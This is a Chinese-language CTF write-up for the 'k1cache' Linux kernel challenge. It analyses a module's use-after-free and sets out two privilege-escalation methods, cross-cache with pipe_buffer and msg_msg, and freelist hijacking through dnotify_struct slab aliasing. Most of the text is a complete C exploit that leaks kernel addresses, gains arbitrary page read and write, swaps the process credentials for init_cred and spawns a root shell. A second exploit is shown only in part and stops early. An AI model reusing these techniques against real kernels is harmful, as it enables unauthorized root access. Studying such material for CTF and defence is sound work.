目录:
- 题面
题目名:k1cache
附件:
- 分析
/ $ uname -a
Linux (none) 6.4.0 #1 SMP PREEMPT_DYNAMIC Mon Sep 18 21:37:46 CST 2023 x86_64 GNU/Linux
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
-cpu kvm64,+smep,+smap\
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-no-reboot
用IDA逆向k1cache.ko
,可以发现内核模块在kernel_init
中创建了设备/dev/klcache
以及一个内存池my_struct
用来分配32字节的对象,分配标志为SLAB_ACCOUNT | SLAB_PANIC | SLAB_HWCACHE_ALIGN
[1]。由于SLAB_ACCOUNT
标志的存在,我们的my_struct
不会与kmalloc-32
合并——但是这不意味着my_struct
不会与任何内存池合并。
int __cdecl kernel_init()
{
_fentry__();
misc_register(&misc);
cache = (kmem_cache *)kmem_cache_create("my_struct", 32LL, 0LL, 0x4042000LL, 0LL);
return 0;
}

我们可以与/dev/klcache
交互,在kernel_ioctl
函数中定义了三种交互方式——show、add与delete。
__int64 __fastcall kernel_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
__int64 v3; // rdx
__int64 result; // rax
unsigned __int64 size_low; // r13
char *v6; // r12
__int64 v7; // rsi
__int64 v8; // rdx
add_args a1; // [rsp+0h] [rbp-38h] BYREF
unsigned __int64 v10; // [rsp+18h] [rbp-20h]
_fentry__(file, cmd, arg);
v10 = __readgsqword(0x28u);
result = 0LL;
if ( cmd == 64 ) // show
{
if ( !copy_from_user(&a1, v3, 24LL) )
{
show((show_args *)a1.size);
return 0LL;
}
return -22LL;
}
if ( cmd == 119 ) // add
{
v7 = v3;
if ( !copy_from_user(&a1, v3, 16LL) )
{
add_only((add_args *)&a1.buf, v7, v8);
return 0LL;
}
return -22LL;
}
if ( cmd != 48 ) // delete
return result;
if ( copy_from_user(&a1, v3, 8LL) )
return -22LL;
if ( LODWORD(a1.size) <= 0x1000 )
{
size_low = LODWORD(a1.size);
if ( LODWORD(a1.size) > 0xFFF )
_ubsan_handle_out_of_bounds(&off_A40, LODWORD(a1.size));
v6 = addrList[size_low];
if ( v6 )
{
if ( size_low > 0xFFF )
_ubsan_handle_out_of_bounds(&off_A20, size_low);
kfree(v6);
}
}
return 0LL;
}
__int64 __fastcall add_only(add_args *args)
{
__int64 v1; // rax
__int64 v2; // rbx
__int64 v3; // rax
unsigned int v4; // r12d
__int64 v6; // [rsp-8h] [rbp-230h]
char temp[512]; // [rsp+0h] [rbp-228h] BYREF
unsigned __int64 v8; // [rsp+200h] [rbp-28h]
_fentry__();
v8 = __readgsqword(0x28u);
v1 = kmem_cache_alloc(cache, 0x400CC0LL);
if ( v1 )
{
v2 = v1;
v3 = copy_from_user(temp, args->size, 32LL);
if ( v3 )
{
return (unsigned int)-22;
}
else
{
*(_QWORD *)v2 = *(_QWORD *)temp;
*(_QWORD *)(v2 + 8) = *(_QWORD *)&temp[8];
*(_QWORD *)(v2 + 16) = *(_QWORD *)&temp[16];
*(_QWORD *)(v2 + 24) = *(_QWORD *)&temp[24];
while ( 1 )
{
v4 = v3;
if ( (unsigned __int64)(int)v3 > 0xFFF )
{
v6 = v3;
_ubsan_handle_out_of_bounds(&off_A80, (int)v3);
v3 = v6;
}
if ( !addrList[v3] )
break;
if ( ++v3 == 4096 )
return 0;
}
if ( (unsigned __int64)(int)v4 > 0xFFF )
_ubsan_handle_out_of_bounds(&off_A60, (int)v4);
addrList[v4] = (char *)v2;
}
}
else
{
return (unsigned int)-12;
}
return v4;
}
__int64 __fastcall show(show_args *args, __int64 *a2)
{
char *v2; // rbx
__int64 v3; // rdi
char buf[4096]; // [rsp+0h] [rbp-1028h] BYREF
unsigned __int64 v6; // [rsp+1000h] [rbp-28h]
_fentry__();
v6 = __readgsqword(0x28u);
memset(buf, 0, sizeof(buf));
if ( (unsigned int)args > 0x1000 )
return 0xFFFFFFFFLL;
if ( (unsigned int)args > 0xFFF )
_ubsan_handle_out_of_bounds(&off_B00, (unsigned int)args);
v2 = addrList[(unsigned int)args];
if ( !v2 )
return 0xFFFFFFFFLL;
if ( (unsigned int)args > 0xFFFuLL )
{
_ubsan_handle_out_of_bounds(&off_AE0, (unsigned int)args);
_ubsan_handle_out_of_bounds(&off_AC0, (unsigned int)args);
_ubsan_handle_out_of_bounds(&off_AA0, (unsigned int)args);
}
v3 = *a2;
*(_QWORD *)buf = *(_QWORD *)v2;
*(_QWORD *)&buf[8] = *((_QWORD *)v2 + 1);
*(_QWORD *)&buf[16] = *((_QWORD *)v2 + 2);
*(_QWORD *)&buf[24] = *((_QWORD *)v2 + 3);
return ((__int64 (__fastcall *)(__int64, char *, __int64))copy_to_user)(v3, buf, 32LL) != 0 ? 0xFFFFFFEA : 0;
}
struct add_args // sizeof=0x10
{
uint64_t size; // useless
char *buf;
};
struct del_args // sizeof=0x8
{
uint64_t idx;
};
struct show_args // sizeof=0x18
{
uint64_t idx;
uint64_t size; // useless
char *buf;
};
addrList
中可以存放4096个从my_struct
中分配的对象。

add:从my_struct
中分配并用指定的数据填充对象,分配标志为___GFP_ACCOUNT | ___GFP_DIRECT_RECLAIM | ___GFP_KSWAPD_RECLAIM | ___GFP_IO | ___GFP_FS
,也即GFP_KERNEL_ACCOUNT
[2]。
show:读取addrList
中任何已存在对象的32字节内容。
delete:释放addrList
中任何已存在的对象,不清空指针。
由于delete
功能中有一个非常明显的UAF漏洞,因此我们很容易想到下面的做法。
- 方法一:Cross Cache + pipe_buffer + msg_msg
首先我们要解决的问题是如何让从my_struct
内存池中分配的object、slab被其他内存池分配到,这需要内核在kfree
时进入__unfreeze_partials
[3, mm/slub.c:2581],在kmem_cache_node
的partial slab数达到cache->min_partial
时执行discard_slab
将一个全空的slab释放回Buddy System。一般情况下,在其他内存池从Buddy System中分配slab时,会取回前面释放的slab。由于/dev/klcache
的UAF漏洞,我们仍然可以通过访问addrList
来读取/二次释放这个已经进入其他内存池的slab上的对象。
接下来,分配struct pipe_buffer
结构体,让内存池kmalloc-cg-xx
(xx
待定,CONFIG_MEMCG_KMEM
默认开启)取回前面释放的slab,从而让某些struct pipe_buffer
结构体(称作“pipe buffer victim”)为我们所控制。我们可以用show读取“pipe buffer victim”上前32字节的数据,通过page
与ops
成员的值分别泄露线性映射区的基址page_offset_base
与内核代码映射的基址kernel_base
。
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page * page; /* 0 8 */
unsigned int offset; /* 8 4 */
unsigned int len; /* 12 4 */
const struct pipe_buf_operations * ops; /* 16 8 */
unsigned int flags; /* 24 4 */
/* XXX 4 bytes hole, try to pack */
long unsigned int private; /* 32 8 */
/* size: 40, cachelines: 1, members: 6 */
/* sum members: 36, holes: 1, sum holes: 4 */
/* last cacheline: 40 bytes */
};
在此之后,通过释放addrList
上残留的指针,我们可以将“pipe buffer victim”释放回kmalloc-cg-xx
。由于freelist的LIFO单链表结构,如果再从该内存池中取出一个对象,并且刚刚被释放的“pipe buffer victim”所在slab为per_cpu_ptr(kmem_cache->cpu_slab, cpu)->slab
,那么取出的对象恰好为“pipe buffer victim”。对这个取出的对象进行读写即可控制“pipe buffer victim”的内容。
现在考虑struct msg_msg
结构体。它是一条DATALEN_MSG
字节以内IPC消息的头部,IPC消息的长度以及除去头部以外的内容都是可控的。通过pipe_fcntl
设置管道的缓冲大小时,内核通过kcalloc
分配连续的nr_slots = size >> PAGE_SHIFT
(2的幂次)个struct pipe_buffer
结构体[4, fs/pipe.c:1239,1258]。考虑nr_slots = 4
(kmalloc-cg-192
),使用msgsnd
系统调用发送192 - sizeof(struct msg_msg)
字节的IPC消息,我们刚好可以完整地控制第三个与第四个struct pipe_buffer
。为了平衡消息队列中消息的数量,我们还需要msgrcv
系统调用来脱链与释放一条消息。
/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;
unsigned int head, tail, mask, n;
bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
// ...
}
为了跳过前两个struct pipe_buffer
,我们可以对管道写入然后读取两页数据让pipe_inode_info->head
与pipe_inode_info->tail
同时指向第三个缓冲,通过IPC消息篡改第三个缓冲,再对管道读写便可实现对任意页的读写。
最后,我们尝试修改当前进程的task_struct->cred
与task_struct->real_cred
为init_cred
。为了方便定位,通过prctl
系统调用修改task_struct->comm
,直接搜索pipe_buffer_victim->page
附近的页,查找与task_struct->comm
匹配的字符串定位task_struct
,最后完成篡改即可将当前进程提权为root权限。
struct task_struct {
// ...
const struct cred * real_cred; /* 2896 8 */
const struct cred * cred; /* 2904 8 */
struct key * cached_requested_key; /* 2912 8 */
char comm[16]; /* 2920 16 */
// ...
/* size: 13440, cachelines: 210, members: 240 */
// ...
};
FINAL EXPLOIT
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <sys/shm.h>
#include <sys/xattr.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#define CMD_ADD 119
#define CMD_DEL 48
#define CMD_SHOW 64
struct add_args // sizeof=0x10
{
uint64_t size;
char *buf;
};
struct del_args // sizeof=0x8
{
uint64_t idx;
};
struct show_args // sizeof=0x18
{
uint64_t idx;
uint64_t size;
char *buf;
};
/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
// cpu_set_t cpu_set;
// CPU_ZERO(&cpu_set);
// CPU_SET(core, &cpu_set);
// sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
// printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }
#define OBJECT_SIZE 32
#define MODPROBE_PATH 0xffffffff831d8ce0
int dev_fd;
#define KERNEL_BASE_0 (0xffffffff81000000ULL)
#define ANON_PIPE_OPS_OFFSET (0xffffffff82246ec0ULL - KERNEL_BASE_0)
#define INIT_CRED_OFFSET (0xffffffff8308c620ULL - KERNEL_BASE_0)
#define PAGE_OFFSET_BASE_0 (0xffff888000000000ULL)
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;
/* msgrcv options */
#define MSG_NOERROR 010000 /* no error if message is too big */
#define MSG_EXCEPT 020000 /* recv any msg except of specified type.*/
#define MSG_COPY 040000 /* copy (not remove) all queue messages */
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
struct msg_msgseg {
struct msg_msgseg * next; /* 0 8 */
/* size: 8, cachelines: 1, members: 1 */
/* last cacheline: 8 bytes */
};
struct list_head {
struct list_head * next; /* 0 8 */
struct list_head * prev; /* 8 8 */
/* size: 16, cachelines: 1, members: 2 */
/* last cacheline: 16 bytes */
};
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
struct seq_file;
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
void err_exit(char *msg, int use_errno)
{
char buf[0x600] = {0,};
sprintf(buf, "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
if (use_errno) perror(buf);
else puts(buf);
getchar();
exit(EXIT_FAILURE);
}
int get_msg_queue(void)
{
int res = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
if (res < 0) {
err_exit("get_msg_queue", 1);
}
return res;
}
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}
/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}
/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}
void build_msg(struct msg_msg *msg, void *m_list_next, void *m_list_prev,
uint64_t m_type, uint64_t m_ts, void *next, void *security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}
struct msgbuf_64 {
long mtype;
union {
char mtext[64];
size_t mqword[8];
};
};
struct msgbuf_192 {
long mtype;
union {
char mtext[192];
size_t mqword[192/8];
};
};
int dev_add(void* buf) {
struct add_args req = { 0x20, buf };
return ioctl(dev_fd, CMD_ADD, &req);
}
int dev_delete(int index) {
struct del_args req = { index };
return ioctl(dev_fd, CMD_DEL, &req);
}
int dev_show(int index, void* buf) {
struct show_args req = { index, 0x20, buf };
return ioctl(dev_fd, CMD_SHOW, &req);
}
void dump(void *buf) {
size_t *bufz = (size_t *)buf;
for (unsigned int i=0; i<(OBJECT_SIZE+7)>>3; ++i) {
char ascii[9];
for (int j=0; j<8; ++j) {
uint8_t ch = (uint8_t)(bufz[i] >> j*8);
ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
}
ascii[8] = 0;
printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016lx\x1b[0m /* \x1b[90;1m%s\x1b[0m */\n", i << 3, bufz[i], ascii);
}
printf("\n");
}
void dump_n(void *buf, size_t n) {
size_t *bufz = (size_t *)buf;
for (unsigned int i=0; i<(n+7)>>3; ++i) {
char ascii[9];
for (int j=0; j<8; ++j) {
uint8_t ch = (uint8_t)(bufz[i] >> j*8);
ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
}
ascii[8] = 0;
printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016lx\x1b[0m /* \x1b[90;1m%s\x1b[0m */\n", i << 3, bufz[i], ascii);
}
printf("\n");
}
long show_and_dump(size_t idx) {
#ifndef VERBOSE
printf("Index: \x1b[32;1m%lu\x1b[0m\n", idx);
#endif
char buf[OBJECT_SIZE];
long status = dev_show(idx, &buf);
dump(&buf);
return status;
}
#define NR_PIPES 400
#define NR_SPRAY 4000
#define NR_MSGSND 300
int victim_pipe_i;
int victim_i;
int victim_i_2;
int venomous_msqid;
int pipe_fds[NR_PIPES][2];
size_t orig_ops;
void arb_write(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
struct msgbuf_192 dummy_buf;
if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("read_msg", 1);
}
memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
fake_pipe->page = page;
fake_pipe->offset = offset;
fake_pipe->len = 0;
fake_pipe->ops = (void*)orig_ops;
fake_pipe->flags = 0x10;
if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("write_msg", 1);
}
write(pipe_fds[victim_pipe_i][1], buf, nbytes);
}
void arb_read(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
struct msgbuf_192 dummy_buf;
if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("read_msg", 1);
}
memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
fake_pipe->page = page;
fake_pipe->offset = offset;
fake_pipe->len = 0x2000;
fake_pipe->ops = (void*)orig_ops;
fake_pipe->flags = 0;
if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("write_msg", 1);
}
read(pipe_fds[victim_pipe_i][0], buf, nbytes);
}
int main(){
dev_fd = open("/dev/klcache", O_RDWR);
if (dev_fd < 0) {
err_exit("Error opening /dev/klcache", 1);
}
size_t tmpbuf[4] = {0,};
char pagebuf2[0x2000] = {0,};
for (int i=0; i<NR_PIPES; ++i) {
if (pipe(pipe_fds[i]) < 0) {
err_exit("pipe", 1);
}
write(pipe_fds[i][1], pagebuf2, i+1);
}
for (int i=0; i<NR_SPRAY; ++i) {
if (dev_add(&tmpbuf) < 0) {
err_exit("Failed to add.", 0);
}
}
for (int i=0; i<NR_SPRAY; ++i) {
dev_delete(i);
}
for (int i=0; i<NR_PIPES; ++i) {
if (fcntl(pipe_fds[i][0], F_SETPIPE_SZ, 0x4000) < 0) {
err_exit("Failed to realloc pipe_buffer", 1);
}
}
size_t orig_buf[4];
for (victim_i=0; victim_i<NR_SPRAY; ++victim_i) {
dev_show(victim_i, &orig_buf);
if (orig_buf[0] > PAGE_OFFSET_BASE_0 && orig_buf[2] > KERNEL_BASE_0) {
goto out;
}
}
err_exit("Exhausted.", 0);
out:
show_and_dump(victim_i);
for (int i=0; i<NR_PIPES; ++i) {
write(pipe_fds[i][1], &pagebuf2, 0x1fff-i);
write(pipe_fds[i][1], pagebuf2, i+1);
read(pipe_fds[i][0], &pagebuf2, 0x2000);
}
show_and_dump(victim_i);
size_t orig_buf_2[4];
for (victim_i_2=0; victim_i_2<NR_SPRAY; ++victim_i_2) {
dev_show(victim_i_2, &orig_buf_2);
if (orig_buf_2[2] > PAGE_OFFSET_BASE_0 && orig_buf_2[3] == orig_buf[1]) {
goto out_;
}
}
err_exit("Exhausted _.", 0);
out_:
show_and_dump(victim_i_2);
page_offset_base = orig_buf[0] & ~0xFFFFFFULL;
kernel_base = orig_buf[2] - ANON_PIPE_OPS_OFFSET;
printf("[\x1b[32;1m+\x1b[0m] page_offset_base = 0x%016lx\n", page_offset_base);
printf("[\x1b[32;1m+\x1b[0m] kernel_base = 0x%016lx\n", kernel_base);
victim_pipe_i = (int)(orig_buf[1] >> 32) - 1ULL;
printf("[\x1b[32;1m+\x1b[0m] victim_pipe_i = %d\n", victim_pipe_i);
goto out2;
out2:
venomous_msqid = get_msg_queue();
struct msgbuf_192 venomous_msgbuf;
venomous_msgbuf.mqword[4] = 0x1919810;
dev_delete(victim_i);
size_t tampered_victim_buf[4];
for (int i=0; i<NR_MSGSND; ++i) {
if (write_msg(venomous_msqid, (struct msgbuf*)&venomous_msgbuf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("write_msg", 1);
}
dev_show(victim_i, &tampered_victim_buf);
if (tampered_victim_buf[1] > PAGE_OFFSET_BASE_0) {
printf("[\x1b[34;1m*\x1b[0m] %d\n", i);
goto out3;
}
}
err_exit("Exhausted 3.", 0);
out3:
show_and_dump(victim_i);
show_and_dump(victim_i_2);
orig_ops = orig_buf[2];
if (prctl(PR_SET_NAME, "astra_kernel") < 0) {
err_exit("PR_SET_NAME", 1);
};
size_t arb_read_buf[512] = {0,};
size_t curr_page;
int i;
size_t *task_comm;
for (i = 0, curr_page = orig_buf[0]+0x4000ULL*0x40ULL; curr_page >= orig_buf[0]-0x10000ULL*0x40ULL; ++i, curr_page -= 0x40) {
if (i % 100 == 0) {
printf("[\x1b[34;1m*\x1b[0m] Pages scanned: %d\n", i);
}
arb_read((void*)curr_page, 0, &arb_read_buf, 0xffe);
task_comm = memmem(&arb_read_buf, 0xffe, "astra_kernel", 12);
if (task_comm && task_comm[-2] > PAGE_OFFSET_BASE_0 && task_comm[-3] > PAGE_OFFSET_BASE_0) {
goto out4;
}
}
err_exit("Exhausted 4.", 0);
out4:
printf("[\x1b[32;1m+\x1b[0m] task_struct on page 0x%016lx\n", curr_page);
task_comm[-2] = task_comm[-3] = INIT_CRED_OFFSET + kernel_base;
arb_write((void*)curr_page, 0, arb_read_buf, 0xffe);
printf("[\x1b[34;1m*\x1b[0m] uid: %d\n", getuid());
printf("[\x1b[34;1m*\x1b[0m] Getting shell...\n");
system("/bin/sh");
return 0;
}
编译:
musl-gcc -no-pie -z now -o exp_heapspray exp_heapspray.c -masm=intel -static
- 方法二:dnotify_struct + Freelist Hijacking
上述方法依赖于cross cache,后续对其他结构体的利用均可以归到此类。
然而,就如本文一开始说的那样,my_struct
不一定会与其他所有内存池隔离开来。
为方便调试,关闭kaslr,以root身份启动shell,获取内核模块的.bss
基址,根据偏移定位cache
变量,查看cache->name
,可以发现这个内存池的名字并不是my_struct
而是dnotify_struct
。
/ $ grep -r "" /sys/module/k1cache/sections/
...
/sys/module/k1cache/sections/.bss:0xffffffffc0203840
...

这意味着my_struct
成为了dnotify_struct
的别名(alias)。
因此,即便不使用cross cache的技巧,我们也可以轻易地劫持struct dnotify_struct
结构体。struct dnotify_struct
的定义如下。
struct dnotify_struct {
struct dnotify_struct * dn_next; /* 0 8 */
__u32 dn_mask; /* 8 4 */
int dn_fd; /* 12 4 */
struct file * dn_filp; /* 16 8 */
fl_owner_t dn_owner; /* 24 8 */
/* size: 32, cachelines: 1, members: 5 */
/* last cacheline: 32 bytes */
};
dnotify是一种过时的目录事件监听机制(现代化的替代方案为inotify),通过信号(SIGIO)和文件描述符通知应用程序目录内文件的修改事件(如创建、删除)。dnotify的事件队列机制在我们后续的利用中起到了重要的作用。内存池dnotify_struct_cache
用来统一管理struct dnotify_struct
。
static int __init dnotify_init(void)
{
dnotify_struct_cache = KMEM_CACHE(dnotify_struct,
SLAB_PANIC|SLAB_ACCOUNT);
dnotify_mark_cache = KMEM_CACHE(dnotify_mark, SLAB_PANIC|SLAB_ACCOUNT);
dnotify_group = fsnotify_alloc_group(&dnotify_fsnotify_ops,
FSNOTIFY_GROUP_NOFS);
if (IS_ERR(dnotify_group))
panic("unable to allocate fsnotify group for dnotify\n");
dnotify_sysctl_init();
return 0;
}
module_init(dnotify_init)
观察fcntl_dirnotify
函数的逻辑,不难发现,如果我们想要分配一个struct dnotify_struct
,将其挂在链表dn_mark
上又不提前触发dnotify_flush
,参数arg
需要满足arg & ~DN_MULTISHOT != 0
。
void dnotify_flush(struct file *filp, fl_owner_t id)
{
// ...
prev = &dn_mark->dn;
while ((dn = *prev) != NULL) {
if ((dn->dn_owner == id) && (dn->dn_filp == filp)) {
*prev = dn->dn_next;
kmem_cache_free(dnotify_struct_cache, dn);
dnotify_recalc_inode_mask(fsn_mark);
break;
}
prev = &dn->dn_next;
}
// ...
}
static int attach_dn(struct dnotify_struct *dn, struct dnotify_mark *dn_mark,
fl_owner_t id, int fd, struct file *filp, __u32 mask)
{
// ...
dn->dn_mask = mask;
dn->dn_fd = fd;
dn->dn_filp = filp;
dn->dn_owner = id;
dn->dn_next = dn_mark->dn;
dn_mark->dn = dn;
return 0;
}
int fcntl_dirnotify(int fd, struct file *filp, unsigned long arg)
{
struct dnotify_struct *dn;
// ...
/* a 0 mask means we are explicitly removing the watch */
if ((arg & ~DN_MULTISHOT) == 0) {
dnotify_flush(filp, id);
error = 0;
goto out_err;
}
// ...
/* expect most fcntl to add new rather than augment old */
dn = kmem_cache_alloc(dnotify_struct_cache, GFP_KERNEL);
if (!dn) {
error = -ENOMEM;
goto out_err;
}
// ...
error = attach_dn(dn, dn_mark, id, fd, filp, mask);
// ...
return error;
}
由于内核配置CONFIG_SLAB_FREELIST_HARDENED
默认开启,对象上freelist的指针总是被加密保护的。
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
// ...
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}
其中swab
用来反转一个64位整型的字节端序,而在没有启用硬件辅助的KASAN时kasan_reset_tag
相当于空操作。这种加密保护增添了直接篡改freelist指针的难度。
然而,利用struct dnotify_struct
的链表结构,如果存在形如A -> B -> C
、由dn_next
链接、同时位于freelist上的一条链,并且A
、B
与C
可以通过show与delete控制,那么我们便可以先读出B
与C
的地址,然后通过B
的freelist指针计算出cache->random
,用double free劫持freelist完成任意写,最后改写modprobe_path就行了。
FINAL EXPLOIT
注:内核基址的泄露使用cross cache与struct seq_operations
完成。
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <signal.h>
#define CMD_ADD 119
#define CMD_DEL 48
#define CMD_SHOW 64
struct add_args // sizeof=0x10
{
uint64_t size;
char *buf;
};
struct del_args // sizeof=0x8
{
uint64_t idx;
};
struct show_args // sizeof=0x18
{
uint64_t idx;
uint64_t size;
char *buf;
};
/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
// cpu_set_t cpu_set;
// CPU_ZERO(&cpu_set);
// CPU_SET(core, &cpu_set);
// sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
// printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }
#define OBJ_SPRAY_NR 4000
#define NR_STAT 128
#define OBJECT_SIZE 32
#define MODPROBE_PATH 0xffffffff831d8ce0
int dev_fd;
#define ANON_PIPE_OPS_OFFSET 0xffffffff82246ec0ULL
#define KERNEL_BASE_0 0xffffffff81000000ULL
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;
size_t page_leak;
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
struct seq_file;
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
void err_exit(char *msg, int use_errno)
{
char buf[0x600] = {0,};
sprintf(buf, "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
if (use_errno) perror(buf);
else puts(buf);
exit(EXIT_FAILURE);
}
int dev_add(void* buf) {
struct add_args req = { 0x20, buf };
return ioctl(dev_fd, CMD_ADD, &req);
}
int dev_delete(int index) {
struct del_args req = { index };
return ioctl(dev_fd, CMD_DEL, &req);
}
int dev_show(int index, void* buf) {
struct show_args req = { index, 0x20, buf };
return ioctl(dev_fd, CMD_SHOW, &req);
}
void dump(void *buf) {
size_t *bufz = (size_t *)buf;
for (unsigned int i=0; i<(OBJECT_SIZE+7)>>3; ++i) {
char ascii[9];
for (int j=0; j<8; ++j) {
uint8_t ch = (uint8_t)(bufz[i] >> j*8);
ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
}
ascii[8] = 0;
printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016lx\x1b[0m /* \x1b[90;1m%s\x1b[0m */\n", i << 3, bufz[i], ascii);
}
printf("\n");
}
long show_and_dump(size_t idx) {
#ifndef VERBOSE
printf("Index: \x1b[32;1m%lu\x1b[0m\n", idx);
#endif
char buf[OBJECT_SIZE];
long status = dev_show(idx, &buf);
dump(&buf);
return status;
}
int dir_fd_1 = -1;
int dir_fd_2 = -1;
int dir_fd_3 = -1;
typedef void * fl_owner_t;
typedef unsigned int __u32;
struct dnotify_struct {
struct dnotify_struct * dn_next; /* 0 8 */
__u32 dn_mask; /* 8 4 */
int dn_fd; /* 12 4 */
struct file * dn_filp; /* 16 8 */
fl_owner_t dn_owner; /* 24 8 */
/* size: 32, cachelines: 1, members: 5 */
/* last cacheline: 32 bytes */
};
uint64_t swab64(uint64_t n) {
uint64_t res = 0;
for (int i=0; i<8; ++i) {
res <<= 8;
res |= (uint64_t)*((uint8_t*)&n+i);
}
return res;
}
size_t rnd;
int idx = 0;
int main(){
dev_fd = open("/dev/klcache", O_RDWR);
if (dev_fd < 0) {
err_exit("error opening /dev/klcache", 1);
}
int victim_fd;
